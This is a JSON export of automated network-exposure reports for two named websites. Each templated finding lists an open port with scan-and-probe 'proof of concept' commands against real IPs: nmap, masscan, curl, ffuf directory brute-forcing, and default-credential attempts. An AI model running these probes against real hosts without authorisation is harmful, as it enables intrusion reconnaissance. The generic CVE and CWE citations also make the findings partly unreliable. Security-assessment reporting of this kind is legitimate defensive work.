[{"_id":{"$oid":"6a0d5d9c0f2a46dfb8d07e3c"},"created_at":{"$date":"2026-05-20T07:07:08.968Z"},"url":"https://pro.anveshaktool.in/","tool":"generate_network_exposure_report","result":{"url":"https://pro.anveshaktool.in/","category":"network_exposure","timestamp":"2026-05-20T07:07:08.962969+00:00","report":"### Open Port 80/tcp on 104.21.23.154\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 104.21.23.154 |\n\n**Description** \nPort 80/tcp is open on IP address `104.21.23.154`, indicating that the system accepts HTTP traffic. This is typically used for serving web content over unencrypted connections. The presence of this port does not inherently indicate a vulnerability but increases the attack surface by exposing services to potential reconnaissance and exploitation attempts.\n\nAn attacker can use tools like Nmap or Masscan to detect such open ports during initial enumeration phases.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker performs a scan using `nmap -p 80 104.21.23.154`.\n2. Confirms that port 80 is open.\n3. Sends an HTTP GET request to probe for hosted applications:\n ```bash\n curl http://104.21.23.154/\n ```\n4. Analyzes response headers and body to identify server software, application type, and possible vulnerabilities.\n\n**Business Impact** \nExposing unnecessary services increases the organization's attack surface. If misconfigured or outdated software runs behind this endpoint, it may lead to unauthorized access, data leakage, or service disruption.\n\n**Remediation** \n- Disable or restrict access to non-critical HTTP endpoints via firewall rules.\n- Ensure only necessary services are exposed publicly.\n- Implement TLS encryption (redirect from HTTP to HTTPS).\n- Regularly audit exposed services for vulnerabilities.\n- Reference: CWE-16, NIST SP 800-53 SC-7\n\n---\n\n### Open Port 443/tcp on 104.21.23.154\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 104.21.23.154 |\n\n**Description** \nPort 443/tcp is open on IP address `104.21.23.154`, indicating support for secure HTTPS communication. While encrypted, this still exposes the service to scanning and probing attacks aimed at identifying SSL/TLS configurations, certificate validity, and underlying web applications.\n\nAttackers commonly target this port to assess web infrastructure security posture.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker uses `nmap` to confirm port 443 is open:\n ```bash\n nmap -p 443 104.21.23.154\n ```\n2. Uses `openssl s_client` to inspect the TLS configuration:\n ```bash\n openssl s_client -connect 104.21.23.154:443\n ```\n3. Probes for known vulnerabilities like Heartbleed or weak cipher suites.\n\n**Business Impact** \nIf improperly configured, TLS termination points can expose sensitive information or allow man-in-the-middle attacks. Even if no immediate exploit exists, visibility into these services invites further targeted attacks.\n\n**Remediation** \n- Enforce strong TLS versions (e.g., TLS 1.2+) and disable older protocols.\n- Use hardened cipher suites; avoid deprecated algorithms.\n- Employ automated certificate management systems.\n- Monitor logs for suspicious activity targeting this port.\n- Reference: CWE-327, OWASP A07:2021 – Identification and Authentication Failures\n\n---\n\n### Open Port 80/tcp (http) on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nThe domain `pro.anveshaktool.in` has port 80 open, accepting HTTP requests. This suggests either intentional cleartext access or automatic redirection setup. Regardless, it contributes to the overall attack surface and should be reviewed for necessity and security implications.\n\n**Attack Scenario (Proof of Concept)** \n1. Perform DNS resolution and connect:\n ```bash\n dig +short pro.anveshaktool.in\n curl http://pro.anveshaktool.in\n ```\n2. Observe whether sensitive data flows over plaintext or if there’s a redirect chain.\n\n**Business Impact** \nInsecure transmission channels increase susceptibility to passive eavesdropping and active tampering. Regulatory frameworks like GDPR or PCI DSS penalize such exposures.\n\n**Remediation** \n- Force HTTPS globally across all subdomains.\n- Configure web server to return strict transport security headers.\n- Remove any unnecessary HTTP-only content.\n- Reference: CWE-311, OWASP A02:2021\n\n---\n\n### Open Port 443/tcp (https) on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nHTTPS port 443 is open on `pro.anveshaktool.in`, enabling encrypted communications. As the standard port for secure web browsing, it represents a critical component of the organization’s digital presence. However, improper implementation can introduce vulnerabilities such as expired certificates, weak ciphers, or insecure renegotiation settings.\n\n**Attack Scenario (Proof of Concept)** \n1. Check connectivity:\n ```bash\n curl -I https://pro.anveshaktool.in\n ```\n2. Analyze TLS handshake parameters:\n ```bash\n nmap --script ssl-enum-ciphers -p443 pro.anveshaktool.in\n ```\n\n**Business Impact** \nWeak TLS implementations erode customer confidence and violate compliance standards. They may enable downgrade attacks leading to intercepted sessions or forged identities.\n\n**Remediation** \n- Enforce modern TLS policies (minimum TLS 1.2).\n- Renew certificates automatically and monitor expiration dates.\n- Deploy OCSP stapling and certificate transparency logging.\n- Reference: CWE-295, RFC 7525\n\n---\n\n### Open Port 80/tcp Detected on 172.67.211.177\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 172.67.211.177 |\n\n**Description** \nHTTP port 80/tcp is open on IP address `172.67.211.177`. Typically serves as a redirector to HTTPS or hosts legacy content. Despite being insecure, many organizations leave it accessible for compatibility reasons, increasing exposure risks.\n\nDetected while scanning `https://pro.anveshaktool.in`.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan identifies port:\n ```bash\n masscan -p80 172.67.211.177\n ```\n2. Requests page to check redirection behavior:\n ```bash\n curl -v http://172.67.211.177\n ```\n3. Looks for cleartext credentials or sensitive paths inadvertently served over HTTP.\n\n**Business Impact** \nData transmitted over HTTP is susceptible to interception. Users accessing login forms or submitting personal data over plain HTTP face significant privacy and integrity threats.\n\n**Remediation** \n- Redirect all HTTP traffic to HTTPS using permanent redirects (`301 Moved Permanently`).\n- Block direct access to HTTP unless explicitly required for legacy clients.\n- Reference: CWE-319, OWASP A02:2021 – Cryptographic Failures\n\n---\n\n### Open Port 443/tcp Detected on 172.67.211.177\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 172.67.211.177 |\n\n**Description** \nStandard HTTPS port 443/tcp is open on IP address `172.67.211.177`. Indicates active hosting of web-based resources protected by TLS. However, its presence also makes it a prime target for reconnaissance and exploitation efforts focused on SSL/TLS weaknesses or web application flaws.\n\nObserved during scan of `https://pro.anveshaktool.in`.\n\n**Attack Scenario (Proof of Concept)** \n1. Confirm port status:\n ```bash\n nmap -p443 172.67.211.177\n ```\n2. Test for SSL/TLS misconfigurations:\n ```bash\n sslscan 172.67.211.177:443\n ```\n3. Attempt to exploit outdated libraries or vulnerable endpoints.\n\n**Business Impact** \nA compromised HTTPS endpoint undermines user trust and compliance requirements. It may facilitate phishing campaigns, session hijacking, or full system compromise depending on backend logic.\n\n**Remediation** \n- Maintain updated TLS stacks and certificates.\n- Conduct regular penetration testing against web-facing assets.\n- Implement HSTS headers and certificate pinning where appropriate.\n- Reference: CWE-295, OWASP A07:2021\n\n---\n\n### Open Port 8080/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 8080/tcp is open and proxied through Cloudflare. This port may serve as an alternative HTTP endpoint for specific applications or microservices. Proxy-based architectures offer benefits but require robust configuration to maintain security boundaries.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan for open ports:\n ```bash\n nmap -p8080 pro.anveshaktool.in\n ```\n2. Test for bypass opportunities or hidden endpoints.\n\n**Business Impact** \nImproperly configured proxies can expose internal APIs or allow attackers to circumvent intended access controls.\n\n**Remediation** \n- Enforce strict proxy routing rules.\n- Monitor logs for anomalous access patterns.\n- Reference: CWE-602, OWASP API Security Top 10 – BOLA\n\n---\n\n### Open Port 8080/tcp Detected on 172.67.211.177\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 172.67.211.177 |\n\n**Description** \nPort 8080/tcp is open on IP address `172.67.211.177`. Commonly used as an alternative HTTP port, especially for proxy servers, application containers (like Tomcat), or developer test environments. Exposed without adequate protection, it may leak internal configurations or provide entry points for attackers.\n\nIdentified during a scan targeting `https://pro.anveshaktool.in`.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan confirms availability:\n ```bash\n nmap -p8080 172.67.211.177\n ```\n2. Accesses the interface directly:\n ```bash\n curl http://172.67.211.177:8080\n ```\n3. Reviews banners, directory listings, or debug pages for exploitable flaws.\n\n**Business Impact** \nImproperly secured proxy or dev/test servers can serve as stepping stones for deeper compromise. Misconfigurations here have led to breaches involving source code leaks and unauthorized API access.\n\n**Remediation** \n- Limit access to trusted networks/IP ranges.\n- Remove default welcome pages and debugging features.\n- Apply authentication and authorization mechanisms.\n- Reference: CWE-16, OWASP ASVS v4.0 Section 14\n\n---\n\n### Open Port 8443/tcp (HTTP) — Cloudflare HTTP Proxy / pro.anveshaktool.in / 8443/tcp\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**\n\nPort 8443/tcp is open and actively serving HTTP traffic via a Cloudflare HTTP proxy. This indicates that the domain `pro.anveshaktool.in` is configured to route traffic through Cloudflare's edge network on this non-standard HTTPS port. While not inherently insecure, exposing services on alternative ports such as 8443 may indicate misconfigurations or deviations from standard practices, especially when used alongside or instead of port 443.\n\nThe presence of a reverse proxy like Cloudflare can obscure backend infrastructure details but also introduces potential attack vectors related to origin server exposure or bypass attempts. Attackers often scan for such alternate ports to discover hidden or less-protected entry points into internal systems.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker performs reconnaissance using tools like Nmap to enumerate open ports:\n\n```bash\nnmap -p 8443 -sV pro.anveshaktool.in\n```\n\nOutput confirms:\n```\nPORT STATE SERVICE VERSION\n8443/tcp open ssl/http Cloudflare http proxy\n```\n\nNext, they attempt to access the application over this port:\n\n```bash\ncurl -v https://pro.anveshaktool.in:8443/\n```\n\nThey observe responses indicating the use of Cloudflare, including headers such as:\n\n```\nServer: cloudflare\nCF-RAY: \n```\n\nIf the origin server is improperly configured to accept direct connections outside of Cloudflare (e.g., by IP address), an attacker might try to bypass Cloudflare protections by identifying and targeting the origin directly.\n\nAlternatively, if legacy configurations exist, this port could expose vulnerable endpoints or outdated versions of applications that are no longer maintained.\n\n**Business Impact**\n\nWhile the mere existence of an open port routed through Cloudflare does not pose immediate risk, it increases the organization’s attack surface. It may lead to unintended information disclosure about infrastructure design choices or reveal deprecated services still accepting traffic. In worst-case scenarios involving origin server leaks or bypasses, attackers could exploit vulnerabilities otherwise mitigated by Cloudflare WAF or DDoS protection layers.\n\nAdditionally, compliance frameworks such as PCI-DSS or ISO 27001 require minimizing unnecessary network exposures, which makes even informational findings worth addressing.\n\n**Remediation**\n\nEnsure only necessary ports are exposed publicly. Standardize web traffic on well-known ports (i.e., 80 for HTTP, 443 for HTTPS). If port 8443 serves a legitimate business purpose (such as testing or staging environments), restrict its accessibility using firewall rules or Cloudflare Access policies.\n\nExample configuration adjustment in Cloudflare dashboard:\n\n- Navigate to **Firewall > Tools**\n- Create a filter based on `(http.host eq \"pro.anveshaktool.in\") and (cf.edge.server_port eq 8443)`\n- Apply action: *Block* or *JS Challenge*\n\nAlternatively, disable listening on port 8443 at the origin unless explicitly required.\n\nReference:\n- CWE-16: Configuration\n- NIST SP 800-53: SC-7 Boundary Protection\n\n---\n\n### Open Port 8443/tcp Detected on 172.67.211.177\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 172.67.211.177 |\n\n**Description** \nPort 8443/tcp is open on IP address `172.67.211.177`. This alternative HTTPS port often hosts administrative interfaces, internal APIs, or development environments. Its exposure increases risk due to less common usage patterns which might lack proper monitoring or hardening practices.\n\nThis port was identified during a scan targeting `https://pro.anveshaktool.in`.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker scans with `masscan`:\n ```bash\n masscan -p8443 172.67.211.177\n ```\n2. Connects via browser or CLI tool:\n ```bash\n curl https://172.67.211.177:8443\n ```\n3. Inspects returned content or error messages to determine purpose and version details.\n\n**Business Impact** \nUnintended exposure of backend or admin interfaces can result in privilege escalation, credential theft, or lateral movement within the network.\n\n**Remediation** \n- Restrict access to alternate HTTPS ports using firewalls or reverse proxies.\n- Apply authentication controls even when accessed internally.\n- Audit all custom ports for business necessity before public exposure.\n- Reference: CWE-1191, NIST SP 800-53 AC-4\n\n---\n\n### Open Port 8880/tcp (HTTP) — Cloudflare HTTP Proxy / pro.anveshaktool.in / 8880/tcp\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**\n\nPort 8880/tcp is open and hosts an HTTP service fronted by a Cloudflare HTTP proxy. This port is commonly associated with development servers, alternative HTTP interfaces, or custom API gateways. Its usage deviates from standard practice where secure web communications typically occur over port 443.\n\nExposing services on non-standard ports increases visibility during automated scans and may attract opportunistic attacks. Although protected by Cloudflare, improper routing rules or lack of strict origin authentication could allow malicious actors to probe backend infrastructure indirectly.\n\nThis configuration should be reviewed to ensure alignment with organizational security baselines and reduction of unnecessary exposure.\n\n**Attack Scenario (Proof of Concept)**\n\nUsing Nmap, an attacker identifies the open port:\n\n```bash\nnmap -p 8880 -sV pro.anveshaktool.in\n```\n\nResponse shows:\n\n```\nPORT STATE SERVICE VERSION\n8880/tcp open http Cloudflare http proxy\n```\n\nThey proceed to query the endpoint:\n\n```bash\ncurl -v http://pro.anveshaktool.in:8880/\n```\n\nHeaders returned include:\n\n```\nVia: 1.1 vegur\nServer: cloudflare\n```\n\nIn some cases, developers leave debug modes enabled or expose administrative panels on these ports without proper authentication. The attacker explores further with directory brute-forcing:\n\n```bash\nffuf -u http://pro.anveshaktool.in:8880/FUZZ -w /path/to/common-dirs.txt\n```\n\nDiscovering paths like `/admin`, `/debug`, or `/metrics` could yield sensitive insights or unauthorized access depending on backend implementation.\n\n**Business Impact**\n\nUnnecessary exposure of services on non-standard ports contributes to expanded attack surfaces and violates defense-in-depth principles. Even though Cloudflare provides a layer of protection, misconfigured origins or flawed logic within routing rules can undermine those safeguards.\n\nOrganizations relying on compliance regimes (GDPR, HIPAA, SOC 2) must justify all externally facing services. Leaving auxiliary ports open without clear documentation or business justification raises audit concerns and increases likelihood of downstream exploitation.\n\n**Remediation**\n\nAudit whether port 8880 is operationally essential. If not, disable it both at the origin server and within DNS/cloud provider settings.\n\nTo block traffic to this port via Cloudflare Firewall:\n\n1. Go to **Security > WAF > Tools**\n2. Add expression:\n ```\n (http.host eq \"pro.anveshaktool.in\") and (cf.edge.server_port eq 8880)\n ```\n3. Set action to **Block**\n\nAlternatively, enforce mutual TLS between Cloudflare and your origin server to prevent unauthorized access regardless of port exposure.\n\nReference:\n- CWE-16: Configuration\n- OWASP ASVS v4.0.3 – V1.3 Secure Communication Channels\n- NIST SP 800-53 Rev. 5 – AC-4 Information Flow Enforcement\n\n---\n\n### Open Port 2052/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 2052/tcp is open and identified as running a Cloudflare HTTP proxy. This indicates that the domain utilizes Cloudflare CDN or WAF services. While beneficial for performance and basic DDoS mitigation, misconfigured origins or bypass techniques can expose backend infrastructure.\n\n**Attack Scenario (Proof of Concept)** \n1. Identify origin IP via DNS history or misconfigured headers:\n ```bash\n curl -H \"Host: pro.anveshaktool.in\" http://origin-ip:2052\n ```\n2. Probe for hidden directories or bypass protections.\n\n**Business Impact** \nBypassing edge-layer defenses allows attackers to reach raw backend servers, potentially exploiting vulnerabilities missed at the perimeter level.\n\n**Remediation** \n- Lock down origin server access to only accept traffic from Cloudflare IPs.\n- Set up proper header validation and rate limiting.\n- Reference: CWE-16, OWASP API Security Top 10 – BOLA\n\n---\n\n### Open Port 2053/tcp (http) — nginx on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 2053/tcp is open and running an Nginx web server. Nginx is widely deployed for high-performance web serving and load balancing. Exposure of this port increases the likelihood of fingerprinting and exploitation based on known vulnerabilities in specific versions or modules.\n\n**Attack Scenario (Proof of Concept)** \n1. Fingerprint server version:\n ```bash\n curl -I http://pro.anveshaktool.in:2053\n ```\n2. Search for CVE entries related to discovered version:\n ```bash\n searchsploit nginx \n ```\n\n**Business Impact** \nOutdated or misconfigured Nginx instances can become gateways for remote code execution, denial-of-service conditions, or unauthorized file access.\n\n**Remediation** \n- Keep Nginx updated to latest stable release.\n- Review configuration files for insecure directives (e.g., `autoindex on`).\n- Reference: CVE-2022-41741, CWE-400\n\n---\n\n### Open Port 2082/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 2082/tcp is open and associated with a Cloudflare HTTP proxy. Similar to other Cloudflare-managed ports, this likely supports additional routing or caching functionality. However, inconsistent proxy configurations may reveal backend infrastructure or allow unintended access paths.\n\n**Attack Scenario (Proof of Concept)** \n1. Enumerate available ports:\n ```bash\n nmap -p2082 pro.anveshaktool.in\n ```\n2. Attempt to access internal services or bypass front-end restrictions.\n\n**Business Impact** \nMisuse of proxy layers can undermine intended access control models, allowing attackers to reach otherwise protected internal systems.\n\n**Remediation** \n- Validate that all proxy ports enforce consistent access policies.\n- Log and monitor unusual access patterns.\n- Reference: CWE-602, OWASP ASVS v4.0 Section 14\n\n---\n\n### Open Port 2083/tcp (http) — nginx on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 2083/tcp is open and running an Nginx instance. Like other non-standard ports, this may host specialized services or act as part of a layered architecture. Without explicit documentation or restriction, it becomes another vector for unauthorized access or exploitation.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan for open ports:\n ```bash\n nmap -p2083 pro.anveshaktool.in\n ```\n2. Explore content or attempt brute-force login if authentication is present.\n\n**Business Impact** \nUndocumented or poorly maintained services increase the probability of successful intrusions. Attackers often focus on lesser-known ports to evade detection.\n\n**Remediation** \n- Document and justify each exposed service.\n- Apply least-privilege principles to service accounts.\n- Reference: CWE-1190, NIST SP 800-53 CM-7\n\n---\n\n### Open Port 2086/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 2086/tcp is open and managed by a Cloudflare HTTP proxy. This port may be used for specific routing purposes, such as handling different types of traffic or integrating with third-party services. Improperly scoped permissions or routing rules can expose internal resources.\n\n**Attack Scenario (Proof of Concept)** \n1. Identify accessible routes:\n ```bash\n curl -k https://pro.anveshaktool.in:2086\n ```\n2. Test for path traversal or SSRF vulnerabilities.\n\n**Business Impact** \nProxy misconfigurations can lead to unauthorized access to internal APIs or databases, resulting in data exfiltration or service abuse.\n\n**Remediation** \n- Define clear routing policies for each proxy port.\n- Sanitize input and validate URLs passed to backend services.\n- Reference: CWE-918, OWASP API Security Top 10 – SSRF\n\n---\n\n### Open Port 2087/tcp (http) — nginx on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 2087/tcp is open and running an Nginx web server. Given its non-standard nature, it may host administrative panels, staging environments, or auxiliary services. These often receive less attention than primary production sites, making them attractive targets for attackers.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan for open ports:\n ```bash\n nmap -p2087 pro.anveshaktool.in\n ```\n2. Attempt to access default dashboards or debug interfaces.\n\n**Business Impact** \nExposed admin panels or debug tools can grant attackers elevated privileges or insight into internal operations, facilitating more sophisticated attacks.\n\n**Remediation** \n- Restrict access to administrative interfaces using IP whitelisting or mutual TLS.\n- Remove default installations and sample files.\n- Reference: CWE-16, OWASP ASVS v4.0 Section 14\n\n---\n\n### Open Port 2095/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 2095/tcp is open and routed through a Cloudflare HTTP proxy. This port may handle email-related services or custom integrations. Proxy-based setups require careful configuration to prevent unintended access or leakage of internal resources.\n\n**Attack Scenario (Proof of Concept)** \n1. Enumerate open ports:\n ```bash\n nmap -p2095 pro.anveshaktool.in\n ```\n2. Investigate responses for clues about backend services or misconfigurations.\n\n**Business Impact** \nEmail or integration endpoints exposed via proxy can be abused for spam relaying, credential harvesting, or phishing attacks.\n\n**Remediation** \n- Secure email gateways with SPF/DKIM/DMARC records.\n- Validate and sanitize inputs to prevent injection attacks.\n- Reference: CWE-93, OWASP Email Security Cheat Sheet\n\n---\n\n### Open Port 2096/tcp (http) — nginx on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 2096/tcp is open and running an Nginx server. This port may host specialized applications or act as a secondary ingress point. Due to its infrequent use, it may escape routine audits, increasing the risk of undetected vulnerabilities.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan for open ports:\n ```bash\n nmap -p2096 pro.anveshaktool.in\n ```\n2. Attempt to enumerate installed modules or plugins.\n\n**Business Impact** \nNeglected services can become backdoors for persistent access or serve as pivot points for lateral movement within the network.\n\n**Remediation** \n- Decommission unused or redundant services.\n- Implement centralized logging and alerting for all exposed ports.\n- Reference: CWE-1190, NIST SP 800-53 SI-4\n\n---\n\n### Open Port 8008/tcp (http) on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 8008/tcp is open and accepting HTTP traffic on `pro.anveshaktool.in`. This port is sometimes used for alternative web services or embedded device interfaces. Its exposure adds complexity to the network topology and increases the number of potential attack vectors.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan for open ports:\n ```bash\n nmap -p8008 pro.anveshaktool.in\n ```\n2. Access the service to determine its function:\n ```bash\n curl http://pro.anveshaktool.in:8008\n ```\n\n**Business Impact** \nUnmanaged or undocumented services pose ongoing risks due to lack of oversight and patching cycles.\n\n**Remediation** \n- Inventory and classify all listening services.\n- Apply uniform security baselines across all exposed ports.\n- Reference: CWE-1190, ISO/IEC 27001 Annex A.12.6.1\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 8015/tcp is open and identified as running FortiGuard Web Filtering, suggesting the presence of a Fortinet security appliance. While designed to protect users, exposing such appliances externally can create new attack surfaces, particularly if default credentials remain unchanged or firmware is outdated.\n\n**Attack Scenario (Proof of Concept)** \n1. Identify service:\n ```bash\n nmap -sV -p8015 pro.anveshaktool.in\n ```\n2. Attempt to log in with default credentials or exploit known vulnerabilities.\n\n**Business Impact** \nCompromised filtering devices can be repurposed for malicious activities, including malware distribution or traffic manipulation.\n\n**Remediation** \n- Change default passwords immediately after deployment.\n- Update firmware regularly according to vendor advisories.\n- Reference: CVE-2022-39952, CWE-798\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description** \nPort 8020/tcp is open and running FortiGuard Web Filtering. Similar to port 8015, this indicates continued reliance on Fortinet infrastructure. Multiple exposed proxy ports suggest complex routing or segmentation strategies, which must be carefully monitored and secured.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan for open ports:\n ```bash\n nmap -p8020 pro.anveshaktool.in\n ```\n2. Probe for known exploits affecting Fortinet products.\n\n**Business Impact** \nMultiple exposed proxy services multiply the risk of successful compromise, especially if they share common vulnerabilities or misconfigurations.\n\n**Remediation** \n- Consolidate proxy functions under fewer, well-monitored ports.\n- Segment internal vs external access rigorously.\n- Reference: CVE-2023-27997, CWE-284","summary":{"total":22}},"summary":{"total":22}},{"_id":{"$oid":"6a0df815edaa75ad624af851"},"created_at":{"$date":"2026-05-20T18:06:13.338Z"},"url":"https://www.veltris.com/","tool":"generate_network_exposure_report","result":{"url":"https://www.veltris.com/","category":"network_exposure","timestamp":"2026-05-20T18:06:13.330637+00:00","report":"### Open Port 443/tcp on 35.227.194.51\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 35.227.194.51 |\n\n**Description** \nPort 443/tcp is open on the host at IP address `35.227.194.51`. This port typically serves HTTPS traffic, indicating that a web server or application may be accessible over a secure encrypted connection. While not inherently insecure, exposing services publicly increases the attack surface and provides potential entry points for reconnaissance and exploitation.\n\nAn attacker can identify this by performing a TCP SYN scan using tools like Nmap or Naabu:\n```bash\nnmap -p 443 35.227.194.51\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker performs initial reconnaissance with:\n ```bash\n nmap -sS -p 443 35.227.194.51\n ```\n2. Confirms service banner via:\n ```bash\n nmap -sV -p 443 35.227.194.51\n ```\n3. Proceeds to enumerate SSL/TLS configurations and check for known vulnerabilities such as weak ciphers or expired certificates.\n\n**Business Impact** \nExposing unnecessary ports increases the organization's digital footprint and risk profile. If misconfigured, these endpoints could lead to unauthorized access, data leakage, or serve as pivot points during lateral movement within the infrastructure.\n\n**Remediation** \n- Restrict access to port 443 only from trusted sources using firewall rules or cloud security groups.\n- Ensure TLS configuration follows best practices (e.g., disable outdated protocols).\n- Regularly audit exposed services for relevance and necessity.\n- Reference: [CWE-16](https://cwe.mitre.org/data/definitions/16.html)\n\n---\n\n### Open Port 80/tcp on 35.227.194.51\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 35.227.194.51 |\n\n**Description** \nPort 80/tcp is open on the host at IP address `35.227.194.51`, commonly used for HTTP communication. The presence of this port indicates a potentially public-facing web server. Unencrypted HTTP traffic poses risks including eavesdropping and man-in-the-middle attacks unless properly redirected to HTTPS.\n\nAttackers often use scanning tools like Masscan or Nmap to detect open HTTP ports:\n```bash\nmasscan -p80 35.227.194.51\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Scan reveals port 80 open:\n ```bash\n masscan -p80 35.227.194.51\n ```\n2. Fetch homepage content:\n ```bash\n curl http://35.227.194.51/\n ```\n3. Analyze response headers and content for version disclosures or misconfigurations.\n\n**Business 